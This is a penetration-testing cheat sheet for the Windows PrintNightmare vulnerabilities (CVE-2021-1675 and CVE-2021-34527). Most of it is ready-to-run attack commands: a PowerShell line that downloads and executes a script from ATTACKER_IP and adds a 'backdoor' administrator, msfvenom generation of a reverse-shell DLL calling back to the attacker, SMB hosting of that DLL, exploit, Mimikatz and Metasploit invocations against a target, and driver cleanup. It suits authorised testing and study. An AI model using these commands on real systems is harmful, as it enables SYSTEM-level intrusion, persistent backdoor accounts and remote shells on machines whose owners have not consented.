Overview
PrintNightmare exploits the Windows Print Spooler service to achieve LPE (Local Privilege Escalation) or RCE (Remote Code Execution) by loading a malicious DLL as SYSTEM.
| CVE | Type | Impact |
|---|
| CVE-2021-1675 | LPE | Local user → SYSTEM |
| CVE-2021-34527 | RCE | Remote code execution as SYSTEM |
Check if Vulnerable
Print Spooler running:
Get-Service -Name Spooler
Missing patch:
wmic qfe | findstr "KB5003690 KB5003695 KB5003697"
If no results → vulnerable.
Local Privilege Escalation (LPE)
Using PowerShell (CVE-2021-1675)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "backdoor" -NewPassword "P@ssw0rd123!" -DriverName "PrintIt"
Verifies by adding local admin. Then:
net localgroup administrators
runas /user:backdoor cmd
GitHub
https://github.com/calebstewart/CVE-2021-1675
Remote Code Execution (RCE)
Step 1 — Create Malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o evil.dll
Step 2 — Host DLL on SMB Share
impacket-smbserver share . -smb2support
Step 3 — Exploit
# cube0x0's exploit
python3 CVE-2021-1675.py DOMAIN/user:password@TARGET '\\ATTACKER_IP\share\evil.dll'
# Using impacket
https://github.com/cube0x0/CVE-2021-1675
Step 4 — Catch Shell
Via Mimikatz
misc::printnightmare /library:\\ATTACKER_IP\share\evil.dll /server:TARGET
Local:
misc::printnightmare /library:C:\Temp\evil.dll
use exploit/windows/dcerpc/CVE_2021_1675_printnightmare
set RHOSTS TARGET
set SMBUser user
set SMBPass password
set SRVHOST ATTACKER_IP
run
Post-Exploitation Cleanup
# Remove added driver (/dd deletes a driver by model; /dl /n only deletes a printer device)
rundll32 printui.dll,PrintUIEntry /dd /m "PrintIt" /q
PrintNightmare can crash the Print Spooler service. In a real engagement, coordinate with the client before exploiting.